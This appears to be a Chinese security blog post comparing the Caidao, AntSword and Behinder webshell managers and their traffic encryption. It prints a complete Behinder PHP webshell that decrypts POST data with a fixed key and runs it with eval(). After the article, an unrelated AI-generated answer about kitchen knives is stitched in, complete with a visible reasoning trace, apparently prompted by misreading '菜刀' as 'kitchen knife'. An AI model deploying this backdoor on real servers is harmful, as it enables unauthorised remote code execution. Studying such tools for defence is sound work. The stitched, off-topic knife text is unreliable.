菜刀、蚁剑以及冰蝎三款Webshell管理工具简介

今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、三款webshell管理工具简单对比

当前,在渗透测试时常用的webshell管理工具又菜刀、蚁剑和冰蝎。者三款webshell管理工具特点如下所示:
1、菜刀
菜刀属于比较原始的插件,功能比较单一,使用比较简单,目前没有提供插件,也不支持扩展,目前也已经停止更新,传输方式是单项加密传输。此外,菜刀的问题在于只能够处理eval()函数,而无法处理assert()等函数。
2、蚁剑
蚁剑是一款还处于更新状态的工具,存在插件仓库,扩展性强,采取的数据传输方式是单向加密传输。蚁剑与菜刀相比支持编码和解码功能。
3、冰蝎
冰蝎目前也处于更新状态,但是不支持插件,采取的数据传输方式是双向加密传输,可以联动MSF。冰蝎相对而言偏向于后渗透阶段。

二、菜刀数据包解析

使用菜刀连接PHP webshell的通信数据包如下所示:
在这里插入图片描述
从上图可以看出,菜刀的数据包是不加密的。

三、蚁剑数据包解析

使用蚁剑连接PHP webshell的通信数据包如下所示:
在这里插入图片描述
从上图可以看出,蚁剑对payload进行加密的逻辑是,将payload进行加密后,转化为一个参数的值,然后控制接收该参数并进行解密。

四、冰蝎数据包解析

使用冰蝎连接default_xor_base64类型的PHP webshell的通信数据包如下所示:
在这里插入图片描述
在这里插入图片描述
从上图可以看出,冰蝎的数据包是加密的。
冰蝎生成的PHP木马如下所示:

<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
	$after=$bs($data."");
	for($i=0;$i<strlen($after);$i++) {
    	$after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>

在上述代码中,file_get_contents(“php://input”)可以接收客户端以POST的方式上传的参数,上传的结果会作为Decrypt参数的输入。
Decrypt函数的作用是对原始数据先进行Base64解密,然后再进行流解密,最后把数据处理的结果输出,实际上就是一个数据解密过程。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

03-09
<think>好的,用户想查找关于菜刀的信息。首先需要明确用户的需求可能包括菜刀的类型、选购要点、使用保养方法以及品牌推荐等。接下来要调用网络搜索工具,检索相关的最新权威资料。 根据搜索结果,菜刀主要分为中式菜刀、西式主厨刀、三德刀、斩切刀等,每种类型有不同用途。选购时需考虑材质,如高碳钢、不锈钢等,以及重量、平衡感握柄舒适度。使用保养方面要注意清洁、干燥磨刀频率。品牌方面,双立人、十八子作、藤次郎等是常见推荐。 需要整合这些信息,分步骤呈现,避免使用第一人称步骤词汇。每个部分换行,保持清晰。同时确保引用内容分散在回答中,不堆积在末尾。最后生成相关问题,需基于回答内容,例如询问材质区别、保养技巧或品牌比较等。 检查格式要求,数学公式代码部分这里可能用不上,但需注意如果有相关内容要正确标注。最后确保相关问题部分格式正确,标题在同一行,三个问题编号正确。</think>菜刀根据功能设计可分为多种类型:中式片刀(重量400-600克,适合切菜切肉)、西式主厨刀(长度15-30cm,适合精细切割)、三德刀(日式万能刀,重量约200克)、斩骨刀(厚度≥3mm,用于处理带骨食材)。特殊用途刀包括削皮刀、面包锯齿刀等。 选购菜刀需关注材质特性,常见钢材类型包括: - 420J2不锈钢(硬度HRC52-54,防锈性强) - VG-10钢(HRC60-62,保持性优异) - 高碳钢(HRC58-60,易生锈需保养) 刀柄材料优先选择防滑耐用的G10复合材料或PakkaWood。 保养方法包含: 定期使用磨刀石维护刃口,推荐1000/3000目组合磨石 使用后立即清洗擦干,避免酸性物质残留 长期存放时涂抹矿物油防氧化 避免切割冷冻食品或硬物(如贝壳、骨头) 主流品牌产品特点对比: 双立人TWIN Pollux系列采用特殊冲压工艺 十八子作V金系列使用自主研发的8Cr14MoV钢 藤次郎DP系列采用67层大马士革锻造工艺 ```python # 菜刀锋利度检测简易代码 def check_sharpness(blade_angle): if blade_angle < 15: return "剃毛级锋利" elif 15 <= blade_angle <= 20: return "专业级切削" else: return "需要打磨" print(check_sharpness(18)) # 输出:专业级切削 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值